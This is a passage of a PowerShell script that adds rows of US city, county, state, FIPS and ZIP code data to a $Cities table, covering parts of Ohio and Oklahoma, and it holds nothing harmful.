webster","Scioto","Ohio","OH","39","45682") + $null = $Cities.Rows.Add("Stout","Scioto","Ohio","OH","39","45684") + $null = $Cities.Rows.Add("Thurman","Gallia","Ohio","OH","39","45685") + $null = $Cities.Rows.Add("Vinton","Gallia","Ohio","OH","39","45686") + $null = $Cities.Rows.Add("Waterloo","Lawrence","Ohio","OH","39","45688") + $null = $Cities.Rows.Add("Waverly","Pike","Ohio","OH","39","45690") + $null = $Cities.Rows.Add("Wellston","Jackson","Ohio","OH","39","45692") + $null = $Cities.Rows.Add("West union","Adams","Ohio","OH","39","45693") + $null = $Cities.Rows.Add("Wheelersburg","Scioto","Ohio","OH","39","45694") + $null = $Cities.Rows.Add("Wilkesville","Vinton","Ohio","OH","39","45695") + $null = $Cities.Rows.Add("Willow wood","Lawrence","Ohio","OH","39","45696") + $null = $Cities.Rows.Add("Winchester","Adams","Ohio","OH","39","45697") + $null = $Cities.Rows.Add("Zaleski","Vinton","Ohio","OH","39","45698") + $null = $Cities.Rows.Add("Zcta 456hh","Adams","Ohio","OH","39","456HH") + $null = $Cities.Rows.Add("Zcta 456xx","Ross","Ohio","OH","39","456XX") + $null = $Cities.Rows.Add("Athens","Athens","Ohio","OH","39","45701") + $null = $Cities.Rows.Add("Albany","Athens","Ohio","OH","39","45710") + $null = $Cities.Rows.Add("Amesville","Athens","Ohio","OH","39","45711") + $null = $Cities.Rows.Add("Barlow","Washington","Ohio","OH","39","45712") + $null = $Cities.Rows.Add("Bartlett","Washington","Ohio","OH","39","45713") + $null = $Cities.Rows.Add("Belpre","Washington","Ohio","OH","39","45714") + $null = $Cities.Rows.Add("Beverly","Washington","Ohio","OH","39","45715") + $null = $Cities.Rows.Add("Buchtel","Athens","Ohio","OH","39","45716") + $null = $Cities.Rows.Add("Chauncey","Athens","Ohio","OH","39","45719") + $null = $Cities.Rows.Add("Coolville","Athens","Ohio","OH","39","45723") + $null = $Cities.Rows.Add("Cutler","Washington","Ohio","OH","39","45724") + $null = $Cities.Rows.Add("Dexter city","Noble","Ohio","OH","39","45727") + $null = $Cities.Rows.Add("Fleming","Washington","Ohio","OH","39","45729") + $null = $Cities.Rows.Add("Glouster","Athens","Ohio","OH","39","45732") + $null = $Cities.Rows.Add("Rinard mills","Monroe","Ohio","OH","39","45734") + $null = $Cities.Rows.Add("Guysville","Athens","Ohio","OH","39","45735") + $null = $Cities.Rows.Add("Jacksonville","Athens","Ohio","OH","39","45740") + $null = $Cities.Rows.Add("Dexter","Meigs","Ohio","OH","39","45741") + $null = $Cities.Rows.Add("Little hocking","Washington","Ohio","OH","39","45742") + $null = $Cities.Rows.Add("Long bottom","Meigs","Ohio","OH","39","45743") + $null = $Cities.Rows.Add("Lowell","Washington","Ohio","OH","39","45744") + $null = $Cities.Rows.Add("Warner","Washington","Ohio","OH","39","45745") + $null = $Cities.Rows.Add("Macksburg","Washington","Ohio","OH","39","45746") + $null = $Cities.Rows.Add("Marietta","Washington","Ohio","OH","39","45750") + $null = $Cities.Rows.Add("Middleport","Meigs","Ohio","OH","39","45760") + $null = $Cities.Rows.Add("Millfield","Athens","Ohio","OH","39","45761") + $null = $Cities.Rows.Add("Nelsonville","Athens","Ohio","OH","39","45764") + $null = $Cities.Rows.Add("New marshfield","Athens","Ohio","OH","39","45766") + $null = $Cities.Rows.Add("New matamoras","Washington","Ohio","OH","39","45767") + $null = $Cities.Rows.Add("Newport","Washington","Ohio","OH","39","45768") + $null = $Cities.Rows.Add("Pomeroy","Meigs","Ohio","OH","39","45769") + $null = $Cities.Rows.Add("Portland","Meigs","Ohio","OH","39","45770") + $null = $Cities.Rows.Add("Racine","Meigs","Ohio","OH","39","45771") + $null = $Cities.Rows.Add("Reedsville","Meigs","Ohio","OH","39","45772") + $null = $Cities.Rows.Add("Reno","Washington","Ohio","OH","39","45773") + $null = $Cities.Rows.Add("Rutland","Meigs","Ohio","OH","39","45775") + $null = $Cities.Rows.Add("Shade","Meigs","Ohio","OH","39","45776") + $null = $Cities.Rows.Add("Stewart","Athens","Ohio","OH","39","45778") + $null = $Cities.Rows.Add("Syracuse","Meigs","Ohio","OH","39","45779") + $null = $Cities.Rows.Add("The plains","Athens","Ohio","OH","39","45780") + $null = $Cities.Rows.Add("Trimble","Athens","Ohio","OH","39","45782") + $null = $Cities.Rows.Add("Vincent","Washington","Ohio","OH","39","45784") + $null = $Cities.Rows.Add("Waterford","Washington","Ohio","OH","39","45786") + $null = $Cities.Rows.Add("Whipple","Washington","Ohio","OH","39","45788") + $null = $Cities.Rows.Add("Wingett run","Washington","Ohio","OH","39","45789") + $null = $Cities.Rows.Add("Zcta 457hh","Athens","Ohio","OH","39","457HH") + $null = $Cities.Rows.Add("Lima","Allen","Ohio","OH","39","45801") + $null = $Cities.Rows.Add("Lima","Allen","Ohio","OH","39","45804") + $null = $Cities.Rows.Add("Lima","Allen","Ohio","OH","39","45805") + $null = $Cities.Rows.Add("Cridersville","Allen","Ohio","OH","39","45806") + $null = $Cities.Rows.Add("Elida","Allen","Ohio","OH","39","45807") + $null = $Cities.Rows.Add("Beaverdam","Allen","Ohio","OH","39","45808") + $null = $Cities.Rows.Add("Gomer","Allen","Ohio","OH","39","45809") + $null = $Cities.Rows.Add("Ada","Hardin","Ohio","OH","39","45810") + $null = $Cities.Rows.Add("Alger","Hardin","Ohio","OH","39","45812") + $null = $Cities.Rows.Add("Antwerp","Paulding","Ohio","OH","39","45813") + $null = $Cities.Rows.Add("Arlington","Hancock","Ohio","OH","39","45814") + $null = $Cities.Rows.Add("Benton ridge","Hancock","Ohio","OH","39","45816") + $null = $Cities.Rows.Add("Bluffton","Allen","Ohio","OH","39","45817") + $null = $Cities.Rows.Add("Buckland","Auglaize","Ohio","OH","39","45819") + $null = $Cities.Rows.Add("Cairo","Allen","Ohio","OH","39","45820") + $null = $Cities.Rows.Add("Cecil","Paulding","Ohio","OH","39","45821") + $null = $Cities.Rows.Add("Carthagena","Mercer","Ohio","OH","39","45822") + $null = $Cities.Rows.Add("Cloverdale","Putnam","Ohio","OH","39","45827") + $null = $Cities.Rows.Add("Coldwater","Mercer","Ohio","OH","39","45828") + $null = $Cities.Rows.Add("Columbus grove","Putnam","Ohio","OH","39","45830") + $null = $Cities.Rows.Add("Continental","Putnam","Ohio","OH","39","45831") + $null = $Cities.Rows.Add("Convoy","Van Wert","Ohio","OH","39","45832") + $null = $Cities.Rows.Add("Delphos","Allen","Ohio","OH","39","45833") + $null = $Cities.Rows.Add("Dola","Hardin","Ohio","OH","39","45835") + $null = $Cities.Rows.Add("Dunkirk","Hardin","Ohio","OH","39","45836") + $null = $Cities.Rows.Add("Dupont","Putnam","Ohio","OH","39","45837") + $null = $Cities.Rows.Add("Elgin","Van Wert","Ohio","OH","39","45838") + $null = $Cities.Rows.Add("Findlay","Hancock","Ohio","OH","39","45840") + $null = $Cities.Rows.Add("Jenera","Hancock","Ohio","OH","39","45841") + $null = $Cities.Rows.Add("Patterson","Hardin","Ohio","OH","39","45843") + $null = $Cities.Rows.Add("Fort jennings","Putnam","Ohio","OH","39","45844") + $null = $Cities.Rows.Add("Fort loramie","Shelby","Ohio","OH","39","45845") + $null = $Cities.Rows.Add("Fort recovery","Mercer","Ohio","OH","39","45846") + $null = $Cities.Rows.Add("Grover hill","Paulding","Ohio","OH","39","45849") + $null = $Cities.Rows.Add("Harrod","Allen","Ohio","OH","39","45850") + $null = $Cities.Rows.Add("Haviland","Paulding","Ohio","OH","39","45851") + $null = $Cities.Rows.Add("Kalida","Putnam","Ohio","OH","39","45853") + $null = $Cities.Rows.Add("Latty","Paulding","Ohio","OH","39","45855") + $null = $Cities.Rows.Add("Leipsic","Putnam","Ohio","OH","39","45856") + $null = $Cities.Rows.Add("Mc comb","Hancock","Ohio","OH","39","45858") + $null = $Cities.Rows.Add("Mc guffey","Hardin","Ohio","OH","39","45859") + $null = $Cities.Rows.Add("Maria stein","Mercer","Ohio","OH","39","45860") + $null = $Cities.Rows.Add("Melrose","Paulding","Ohio","OH","39","45861") + $null = $Cities.Rows.Add("Mendon","Mercer","Ohio","OH","39","45862") + $null = $Cities.Rows.Add("Middle point","Van Wert","Ohio","OH","39","45863") + $null = $Cities.Rows.Add("Minster","Auglaize","Ohio","OH","39","45865") + $null = $Cities.Rows.Add("Montezuma","Mercer","Ohio","OH","39","45866") + $null = $Cities.Rows.Add("Mount blanchard","Hancock","Ohio","OH","39","45867") + $null = $Cities.Rows.Add("Mount cory","Hancock","Ohio","OH","39","45868") + $null = $Cities.Rows.Add("New bremen","Auglaize","Ohio","OH","39","45869") + $null = $Cities.Rows.Add("New hampshire","Auglaize","Ohio","OH","39","45870") + $null = $Cities.Rows.Add("New knoxville","Auglaize","Ohio","OH","39","45871") + $null = $Cities.Rows.Add("North baltimore","Wood","Ohio","OH","39","45872") + $null = $Cities.Rows.Add("Oakwood","Paulding","Ohio","OH","39","45873") + $null = $Cities.Rows.Add("Ohio city","Van Wert","Ohio","OH","39","45874") + $null = $Cities.Rows.Add("Gilboa","Putnam","Ohio","OH","39","45875") + $null = $Cities.Rows.Add("Ottoville","Putnam","Ohio","OH","39","45876") + $null = $Cities.Rows.Add("Pandora","Putnam","Ohio","OH","39","45877") + $null = $Cities.Rows.Add("Paulding","Paulding","Ohio","OH","39","45879") + $null = $Cities.Rows.Add("Payne","Paulding","Ohio","OH","39","45880") + $null = $Cities.Rows.Add("Rawson","Hancock","Ohio","OH","39","45881") + $null = $Cities.Rows.Add("Rockford","Mercer","Ohio","OH","39","45882") + $null = $Cities.Rows.Add("Saint henry","Mercer","Ohio","OH","39","45883") + $null = $Cities.Rows.Add("Saint marys","Auglaize","Ohio","OH","39","45885") + $null = $Cities.Rows.Add("Scott","Van Wert","Ohio","OH","39","45886") + $null = $Cities.Rows.Add("Spencerville","Allen","Ohio","OH","39","45887") + $null = $Cities.Rows.Add("Uniopolis","Auglaize","Ohio","OH","39","45888") + $null = $Cities.Rows.Add("Van buren","Hancock","Ohio","OH","39","45889") + $null = $Cities.Rows.Add("Vanlue","Hancock","Ohio","OH","39","45890") + $null = $Cities.Rows.Add("Van wert","Van Wert","Ohio","OH","39","45891") + $null = $Cities.Rows.Add("Venedocia","Van Wert","Ohio","OH","39","45894") + $null = $Cities.Rows.Add("Wapakoneta","Auglaize","Ohio","OH","39","45895") + $null = $Cities.Rows.Add("Waynesfield","Auglaize","Ohio","OH","39","45896") + $null = $Cities.Rows.Add("Williamstown","Hancock","Ohio","OH","39","45897") + $null = $Cities.Rows.Add("Willshire","Van Wert","Ohio","OH","39","45898") + $null = $Cities.Rows.Add("Wren","Van Wert","Ohio","OH","39","45899") + $null = $Cities.Rows.Add("Zcta 458hh","Mercer","Ohio","OH","39","458HH") + $null = $Cities.Rows.Add("","Texas","Oklahoma","OK","40","67950") + $null = $Cities.Rows.Add("Alex","Grady","Oklahoma","OK","40","73002") + $null = $Cities.Rows.Add("Edmond","Oklahoma","Oklahoma","OK","40","73003") + $null = $Cities.Rows.Add("Amber","Grady","Oklahoma","OK","40","73004") + $null = $Cities.Rows.Add("Anadarko","Caddo","Oklahoma","OK","40","73005") + $null = $Cities.Rows.Add("Apache","Caddo","Oklahoma","OK","40","73006") + $null = $Cities.Rows.Add("Arcadia","Oklahoma","Oklahoma","OK","40","73007") + $null = $Cities.Rows.Add("Bethany","Oklahoma","Oklahoma","OK","40","73008") + $null = $Cities.Rows.Add("Binger","Caddo","Oklahoma","OK","40","73009") + $null = $Cities.Rows.Add("Blanchard","McClain","Oklahoma","OK","40","73010") + $null = $Cities.Rows.Add("Bradley","Grady","Oklahoma","OK","40","73011") + $null = $Cities.Rows.Add("Edmond","Oklahoma","Oklahoma","OK","40","73013") + $null = $Cities.Rows.Add("Calumet","Canadian","Oklahoma","OK","40","73014") + $null = $Cities.Rows.Add("Carnegie","Caddo","Oklahoma","OK","40","73015") + $null = $Cities.Rows.Add("Cashion","Kingfisher","Oklahoma","OK","40","73016") + $null = $Cities.Rows.Add("Cement","Caddo","Oklahoma","OK","40","73017") + $null = $Cities.Rows.Add("Chickasha","Grady","Oklahoma","OK","40","73018") + $null = $Cities.Rows.Add("Choctaw","Oklahoma","Oklahoma","OK","40","73020") + $null = $Cities.Rows.Add("Colony","Washita","Oklahoma","OK","40","73021") + $null = $Cities.Rows.Add("Concho","Canadian","Oklahoma","OK","40","73022") + $null = $Cities.Rows.Add("Corn","Washita","Oklahoma","OK","40","73024") + $null = $Cities.Rows.Add("Okla univ studen","Cleveland","Oklahoma","OK","40","73026") + $null = $Cities.Rows.Add("Coyle","Logan","Oklahoma","OK","40","73027") + $null = $Cities.Rows.Add("Crescent","Logan","Oklahoma","OK","40","73028") + $null = $Cities.Rows.Add("Cyril","Caddo","Oklahoma","OK","40","73029") + $null = $Cities.Rows.Add("Davis","Murray","Oklahoma","OK","40","73030") + $null = $Cities.Rows.Add("Dibble","McClain","Oklahoma","OK","40","73031") + $null = $Cities.Rows.Add("Dougherty","Murray","Oklahoma","OK","40","73032") + $null = $Cities.Rows.Add("Eakly","Caddo","Oklahoma","OK","40","73033") + $null = $Cities.Rows.Add("Edmond","Oklahoma","Oklahoma","OK","40","73034") + $null = $Cities.Rows.Add("El reno","Canadian","Oklahoma","OK","40","73036") + $null = $Cities.Rows.Add("Fort cobb","Caddo","Oklahoma","OK","40","73038") + $null = $Cities.Rows.Add("Geary","Blaine","Oklahoma","OK","40","73040") + $null = $Cities.Rows.Add("Gotebo","Kiowa","Oklahoma","OK","40","73041") + $null = $Cities.Rows.Add("Gracemont","Caddo","Oklahoma","OK","40","73042") + $null = $Cities.Rows.Add("Greenfield","Blaine","Oklahoma","OK","40","73043") + $null = $Cities.Rows.Add("Guthrie","Logan","Oklahoma","OK","40","73044") + $null = $Cities.Rows.Add("Harrah","Oklahoma","Oklahoma","OK","40","73045") + $null = $Cities.Rows.Add("Hinton","Caddo","Oklahoma","OK","40","73047") + $null = $Cities.Rows.Add("Hydro","Caddo","Oklahoma","OK","40","73048") + $null = $Cities.Rows.Add("Jones","Oklahoma","Oklahoma","OK","40","73049") + $null = $Cities.Rows.Add("Langston","Logan","Oklahoma","OK","40","73050") + $null = $Cities.Rows.Add("Lexington","Cleveland","Oklahoma","OK","40","73051") + $null = $Cities.Rows.Add("Lindsay","Garvin","Oklahoma","OK","40","73052") + $null = $Cities.Rows.Add("Lookeba","Caddo","Oklahoma","OK","40","73053") + $null = $Cities.Rows.Add("Luther","Oklahoma","Oklahoma","OK","40","73054") + $null = $Cities.Rows.Add("Marlow","Stephens","Oklahoma","OK","40","73055") + $null = $Cities.Rows.Add("Marshall","Logan","Oklahoma","OK","40","73056") + $null = $Cities.Rows.Add("Maysville","Garvin","Oklahoma","OK","40","73057") + $null = $Cities.Rows.Add("Meridian","Logan","Oklahoma","OK","40","73058") + $null = $Cities.Rows.Add("Minco","Grady","Oklahoma","OK","40","73059") + $null = $Cities.Rows.Add("Morrison","Noble","Oklahoma","OK","40","73061") + $null = $Cities.Rows.Add("Mountain view","Kiowa","Oklahoma","OK","40","73062") + $null = $Cities.Rows.Add("Mulhall","Logan","Oklahoma","OK","40","73063") + $null = $Cities.Rows.Add("Mustang","Canadian","Oklahoma","OK","40","73064") + $null = $Cities.Rows.Add("Newcastle","McClain","Oklahoma","OK","40","73065") + $null = $Cities.Rows.Add("Nicoma park","Oklahoma","Oklahoma","OK","40","73066") + $null = $Cities.Rows.Add("Ninnekah","Grady","Oklahoma","OK","40","73067") + $null = $Cities.Rows.Add("Noble","Cleveland","Oklahoma","OK","40","73068") + $null = $Cities.Rows.Add("Norman","Cleveland","Oklahoma","OK","40","73069") + $null = $Cities.Rows.Add("Norman","Cleveland","Oklahoma","OK","40","73071") + $null = $Cities.Rows.Add("Norman","Cleveland","Oklahoma","OK","40","73072") + $null = $Cities.Rows.Add("Orlando","Logan","Oklahoma","OK","40","73073") + $null = $Cities.Rows.Add("Paoli","Garvin","Oklahoma","OK","40","73074") + $null = $Cities.Rows.Add("Pauls valley","Garvin","Oklahoma","OK","40","73075") + $null = $Cities.Rows.Add("Perry","Noble","Oklahoma","OK","40","73077") + $null = $Cities.Rows.Add("Piedmont","Canadian","Oklahoma","OK","40","73078") + $null = $Cities.Rows.Add("Pocasset","Grady","Oklahoma","OK","40","73079") + $null = $Cities.Rows.Add("Purcell","McClain","Oklahoma","OK","40","73080") + $null = $Cities.Rows.Add("Rush springs","Grady","Oklahoma","OK","40","73082") + $null = $Cities.Rows.Add("Spencer","Oklahoma","Oklahoma","OK","40","73084") + $null = $Cities.Rows.Add("Sulphur","Murray","Oklahoma","OK","40","73086") + $null = $Cities.Rows.Add("Tuttle","Grady","Oklahoma","OK","40","73089") + $null = $Cities.Rows.Add("Union city","Canadian","Oklahoma","OK","40","73090") + $null = $Cities.Rows.Add("Verden","Grady","Oklahoma","OK","40","73092") + $null = $Cities.Rows.Add("Washington","McClain","Oklahoma","OK","40","73093") + $null = $Cities.Rows.Add("Wayne","McClain","Oklahoma","OK","40","73095") + $null = $Cities.Rows.Add("Weatherford","Custer","Oklahoma","OK","40","73096") + $null = $Cities.Rows.Add("Wheatland","Oklahoma","Oklahoma","OK","40","73097") + $null = $Cities.Rows.Add("Wynnewood","Garvin","Oklahoma","OK","40","73098") + $null = $Cities.Rows.Add("Yukon","Canadian","Oklahoma","OK","40","73099") + $null = $Cities.Rows.Add("Zcta 730hh","Caddo","Oklahoma","OK","40","730HH") + $null = $Cities.Rows.Add("Zcta 730xx","Kiowa","Oklahoma","OK","40","730XX") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73102") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73103") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73104") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73105") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73106") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73107") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73108") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73109") + $null = $Cities.Rows.Add("Midwest city","Oklahoma","Oklahoma","OK","40","73110") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73111") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73112") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73114") + $null = $Cities.Rows.Add("Del city","Oklahoma","Oklahoma","OK","40","73115") + $null = $Cities.Rows.Add("Nichols hills","Oklahoma","Oklahoma","OK","40","73116") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73117") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73118") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73119") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73120") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73121") + $null = $Cities.Rows.Add("Warr acres","Oklahoma","Oklahoma","OK","40","73122") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73127") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73128") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73129") + $null = $Cities.Rows.Add("Midwest city","Oklahoma","Oklahoma","OK","40","73130") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73131") + $null = $Cities.Rows.Add("Warr acres","Oklahoma","Oklahoma","OK","40","73132") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73134") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73135") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73139") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73141") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73142") + $null = $Cities.Rows.Add("Tinker afb","Oklahoma","Oklahoma","OK","40","73145") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73149") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73150") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73151") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73159") + $null = $Cities.Rows.Add("Moore","Cleveland","Oklahoma","OK","40","73160") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73162") + $null = $Cities.Rows.Add("Moore","Cleveland","Oklahoma","OK","40","73165") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73169") + $null = $Cities.Rows.Add("Moore","Cleveland","Oklahoma","OK","40","73170") + $null = $Cities.Rows.Add("Oklahoma city","Cleveland","Oklahoma","OK","40","73173") + $null = $Cities.Rows.Add("Oklahoma city","Oklahoma","Oklahoma","OK","40","73179") + $null = $Cities.Rows.Add("Zcta 731hh","Cleveland","Oklahoma","OK","40","731HH") + $null = $Cities.Rows.Add("Milo","Carter","Oklahoma","OK","40","73401") + $null = $Cities.Rows.Add("Zcta 73425","Stephens","Oklahoma","OK","40","73425") + $null = $Cities.Rows.Add("Burneyville","Love","Oklahoma","OK","40","73430") + $null = $Cities.Rows.Add("Coleman","Johnston","Oklahoma","OK","40","73432") + $null = $Cities.Rows.Add("Zcta 73433","Garvin","Oklahoma","OK","40","73433") + $null = $Cities.Rows.Add("Zcta 73434","Garvin","Oklahoma","OK","40","73434") + $null = $Cities.Rows.Add("Fox","Carter","Oklahoma","OK","40","73435") + $null = $Cities.Rows.Add("Graham","Carter","Oklahoma","OK","40","73437") + $null = $Cities.Rows.Add("Healdton","Carter","Oklahoma","OK","40","73438") + $null = $Cities.Rows.Add("Kingston","Marshall","Oklahoma","OK","40","73439") + $null = $Cities.Rows.Add("Lebanon","Marshall","Oklahoma","OK","40","73440") + $null = $Cities.Rows.Add("Leon","Love","Oklahoma","OK","40","73441") + $null = $Cities.Rows.Add("Loco","Stephens","Oklahoma","OK","40","73442") + $null = $Cities.Rows.Add("Lone grove","Carter","Oklahoma","OK","40","73443") + $null = $Cities.Rows.Add("Zcta 73444","Garvin","Oklahoma","OK","40","73444") + $null = $Cities.Rows.Add("Mc millan","Marshall","Oklahoma","OK","40","73446") + $null = $Cities.Rows.Add("Mannsville","Johnston","Oklahoma","OK","40","73447") + $null = $Cities.Rows.Add("Marietta","Love","Oklahoma","OK","40","73448") + $null = $Cities.Rows.Add("Mead","Bryan","Oklahoma","OK","40","73449") + $null = $Cities.Rows.Add("Milburn","Johnston","Oklahoma","OK","40","73450") + $null = $Cities.Rows.Add("Overbrook","Love","Oklahoma","OK","40","73453") + $null = $Cities.Rows.Add("Ravia","Johnston","Oklahoma","OK","40","73455") + $null = $Cities.Rows.Add("Ringling","Jefferson","Oklahoma","OK","40","73456") + $null = $Cities.Rows.Add("Springer","Carter","Oklahoma","OK","40","73458") + $null = $Cities.Rows.Add("Thackerville","Love","Oklahoma","OK","40","73459") + $null = $Cities.Rows.Add("Tishomingo","Johnston","Oklahoma","OK","40","73460") + $null = $Cities.Rows.Add("Wapanucka","Johnston","Oklahoma","OK","40","73461") + $null = $Cities.Rows.Add("Rubottom","Carter","Oklahoma","OK","40","73463") + $null = $Cities.Rows.Add("Zcta 73481","Carter","Oklahoma","OK","40","73481") + $null = $Cities.Rows.Add("Zcta 73487","Carter","Oklahoma","OK","40","73487") + $null = $Cities.Rows.Add("Zcta 73488","Carter","Oklahoma","OK","40","73488") + $null = $Cities.Rows.Add("Zcta 73491","Stephens","Oklahoma","OK","40","73491") + $null = $Cities.Rows.Add("Zcta 734hh","Bryan","Oklahoma","OK","40","734HH") + $null = $Cities.Rows.Add("Lawton","Comanche","Oklahoma","OK","40","73501") + $null = $Cities.Rows.Add("Fort sill","Comanche","Oklahoma","OK","40","73503") + $null = $Cities.Rows.Add("Lawton","Comanche","Oklahoma","OK","40","73505") + $null = $Cities.Rows.Add("Lawton","Comanche","Oklahoma","OK","40","73507") + $null = $Cities.Rows.Add("Addington","Jefferson","Oklahoma","OK","40","73520") + $null = $Cities.Rows.Add("Altus","Jackson","Oklahoma","OK","40","73521") + $null = $Cities.Rows.Add("Blair","Jackson","Oklahoma","OK","40","73526") + $null = $Cities.Rows.Add("Cache","Comanche","Oklahoma","OK","40","73527") + $null = $Cities.Rows.Add("Chattanooga","Comanche","Oklahoma","OK","40","73528") + $null = $Cities.Rows.Add("Comanche","Stephens","Oklahoma","OK","40","73529") + $null = $Cities.Rows.Add("Davidson","Tillman","Oklahoma","OK","40","73530") + $null = $Cities.Rows.Add("Devol","Cotton","Oklahoma","OK","40","73531") + $null = $Cities.Rows.Add("Duke","Jackson","Oklahoma","OK","40","73532") + $null = $Cities.Rows.Add("Duncan","Stephens","Oklahoma","OK","40","73533") + $null = $Cities.Rows.Add("Eldorado","Jackson","Oklahoma","OK","40","73537") + $null = $Cities.Rows.Add("Elgin","Comanche","Oklahoma","OK","40","73538") + $null = $Cities.Rows.Add("Elmer","Jackson","Oklahoma","OK","40","73539") + $null = $Cities.Rows.Add("Faxon","Comanche","Oklahoma","OK","40","73540") + $null = $Cities.Rows.Add("Fletcher","Comanche","Oklahoma","OK","40","73541") + $null = $Cities.Rows.Add("Frederick","Tillman","Oklahoma","OK","40","73542") + $null = $Cities.Rows.Add("Geronimo","Comanche","Oklahoma","OK","40","73543") + $null = $Cities.Rows.Add("Gould","Harmon","Oklahoma","OK","40","73544") + $null = $Cities.Rows.Add("Grandfield","Tillman","Oklahoma","OK","40","73546") + $null = $Cities.Rows.Add("Granite","Greer","Oklahoma","OK","40","73547") + $null = $Cities.Rows.Add("Hastings","Stephens","Oklahoma","OK","40","73548") + $null = $Cities.Rows.Add("Headrick","Jackson","Oklahoma","OK","40","73549") + $null = $Cities.Rows.Add("Hollis","Harmon","Oklahoma","OK","40","73550") + $null = $Cities.Rows.Add("Hollister","Tillman","Oklahoma","OK","40","73551") + $null = $Cities.Rows.Add("Indiahoma","Comanche","Oklahoma","OK","40","73552") + $null = $Cities.Rows.Add("Loveland","Tillman","Oklahoma","OK","40","73553") + $null = $Cities.Rows.Add("Reed","Greer","Oklahoma","OK","40","73554") + $null = $Cities.Rows.Add("Manitou","Tillman","Oklahoma","OK","40","73555") + $null = $Cities.Rows.Add("Martha","Jackson","Oklahoma","OK","40","73556") + $null = $Cities.Rows.Add("Medicine park","Comanche","Oklahoma","OK","40","73557") + $null = $Cities.Rows.Add("Mountain park","Kiowa","Oklahoma","OK","40","73559") + $null = $Cities.Rows.Add("Olustee","Jackson","Oklahoma","OK","40","73560") + $null = $Cities.Rows.Add("Oscar","Jefferson","Oklahoma","OK","40","73561") + $null = $Cities.Rows.Add("Randlett","Cotton","Oklahoma","OK","40","73562") + $null = $Cities.Rows.Add("Roosevelt","Kiowa","Oklahoma","OK","40","73564") + $null = $Cities.Rows.Add("Ryan","Jefferson","Oklahoma","OK","40","73565") + $null = $Cities.Rows.Add("Snyder","Kiowa","Oklahoma","OK","40","73566") + $null = $Cities.Rows.Add("Sterling","Comanche","Oklahoma","OK","40","73567") + $null = $Cities.Rows.Add("Temple","Cotton","Oklahoma","OK","40","73568") + $null = $Cities.Rows.Add("Grady","Jefferson","Oklahoma","OK","40","73569") + $null = $Cities.Rows.Add("Tipton","Tillman","Oklahoma","OK","40","73570") + $null = $Cities.Rows.Add("Vinson","Harmon","Oklahoma","OK","40","73571") + $null = $Cities.Rows.Add("Walters","Cotton","Oklahoma","OK","40","73572") + $null = $Cities.Rows.Add("Waurika","Jefferson","Oklahoma","OK","40","73573") + $null = $Cities.Rows.Add("Zcta 735hh","Comanche","Oklahoma","OK","40","735HH") + $null = $Cities.Rows.Add("Zcta 735xx","Jackson","Oklahoma","OK","40","735XX") + $null = $Cities.Rows.Add("Clinton","Custer","Oklahoma","OK","40","73601") + $null = $Cities.Rows.Add("Arapaho","Custer","Oklahoma","OK","40","73620") + $null = $Cities.Rows.Add("Bessie","Washita","Oklahoma","OK","40","73622") + $null = $Cities.Rows.Add("Burns flat","Washita","Oklahoma","OK","40","73624") + $null = $Cities.Rows.Add("Butler","Custer","Oklahoma","OK","40","73625") + $null = $Cities.Rows.Add("Canute","Washita","Oklahoma","OK","40","73626") + $null = $Cities.Rows.Add("Carter","Beckham","Oklahoma","OK","40","73627") + $null = $Cities.Rows.Add("Strong city","Roger Mills","Oklahoma","OK","40","73628") + $null = $Cities.Rows.Add("Cordell","Washita","Oklahoma","OK","40","73632") + $null = $Cities.Rows.Add("Crawford","Roger Mills","Oklahoma","OK","40","73638") + $null = $Cities.Rows.Add("Custer city","Custer","Oklahoma","OK","40","73639") + $null = $Cities.Rows.Add("Dill city","Washita","Oklahoma","OK","40","73641") + $null = $Cities.Rows.Add("Durham","Roger Mills","Oklahoma","OK","40","73642") + $null = $Cities.Rows.Add("Elk city","Beckham","Oklahoma","OK","40","73644") + $null = $Cities.Rows.Add("Erick","Beckham","Oklahoma","OK","40","73645") + $null = $Cities.Rows.Add("Fay","Blaine","Oklahoma","OK","40","73646") + $null = $Cities.Rows.Add("Foss","Washita","Oklahoma","OK","40","73647") + $null = $Cities.Rows.Add("Hammon","Roger Mills","Oklahoma","OK","40","73650") + $null = 